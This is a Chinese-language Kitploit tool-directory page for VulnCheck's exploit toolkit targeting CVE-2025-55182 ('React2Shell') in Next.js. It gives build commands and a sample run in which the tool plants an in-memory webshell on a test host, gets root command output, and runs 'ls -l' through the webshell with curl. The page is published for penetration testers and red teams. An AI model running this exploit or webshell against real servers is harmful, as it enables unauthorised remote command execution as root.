Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-55182 — VulnCheck CVE-2025-55182 react2shell | Kitploit
工具/GitHubGitHub/vulncheck-oss/cve-2025-55182
Payload生成漏洞分析漏洞利用ShellcodeWeb应用程序漏洞利用渗透测试红队
GitHubvulncheck-oss/cve-2025-55182

cve-2025-55182

VulnCheck CVE-2025-55182 react2shell

查看仓库
219个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182:漏洞利用工具集

导出的 VulnCheck 初始访问情报 工具集的一小部分,针对 CVE-2025-55182 React2Shell 漏洞。团队对这些工具的一些观察可在博客文章中阅读。

目录

  • ./inmem-webshell - 一个内存型 Webshell 变种

构建

所有组件均基于我们的漏洞利用框架 go-exploit 构建。每个目录包含有趣工具的一个副本。

如果你有可用的 Go 构建环境,且安装了 golangci-lint 和 GNU make,你可以使用 make:

root@kitploit:~
$ make
gofmt -d -w cve-2025-55182.go
golangci-lint run --fix --timeout 3m cve-2025-55182.go
0 issues.
GOOS=linux GOARCH=amd64 go build  -o build/cve-2025-55182_linux-amd64 cve-2025-55182.go

要构建漏洞利用的 Docker 镜像,只需:

root@kitploit:~
make docker

内存型 NextJS Webshell

这是一个针对 next.js 使用 React2Shell 的内存型 Webshell 实现。我们首次看到该演示是在这里。该 Webshell 在每次新攻击中随机化。

root@kitploit:~
poptart@grimm $ ./build/cve-2025-55182_linux-amd64 -rhost 172.17.0.1 -rport 3000 -e
time=2025-12-08T15:28:06.892-07:00 level=STATUS msg="Starting target" index=0 host=172.17.0.1 port=3000 ssl=false "ssl auto"=false
time=2025-12-08T15:28:06.892-07:00 level=STATUS msg="Generating webshell payload"
time=2025-12-08T15:28:06.893-07:00 level=STATUS msg="Uploading webshell to target"
time=2025-12-08T15:28:16.902-07:00 level=ERROR msg="HTTP request error: Post \"http://172.17.0.1:3000/\": context deadline exceeded (Client.Timeout exceeded while awaiting headers)"
time=2025-12-08T15:28:16.902-07:00 level=SUCCESS msg="Webshell installed!" location=http://172.17.0.1:3000/UByGoR
time=2025-12-08T15:28:16.902-07:00 level=STATUS msg="Testing `id`" testurl="http://172.17.0.1:3000/UByGoR?z=id"
time=2025-12-08T15:28:16.917-07:00 level=SUCCESS msg="uid=0(root) gid=0(root) groups=0(root)\n"
time=2025-12-08T15:28:16.917-07:00 level=SUCCESS msg="Exploit successfully completed" exploited=true
poptart@grimm $ curl http://172.17.0.1:3000/UByGoR?z=ls%20-l
total 72
-rw-r--r--   1 root root     77 Dec  4 23:41 jsconfig.json
-rw-r--r--   1 root root     92 Dec  4 23:41 next.config.mjs
drwxr-xr-x 172 root root    173 Dec  4 23:41 node_modules
-rw-r--r--   1 root root  16384 Dec  4 23:41 notes.db
-rw-r--r--   1 root root 123663 Dec  4 23:41 package-lock.json
-rw-r--r--   1 root root    467 Dec  4 23:41 package.json
-rw-r--r--   1 root root   6028 Dec  4 23:41 seed.sql
drwxr-xr-x   3 root root      3 Dec  4 23:41 src
下载工具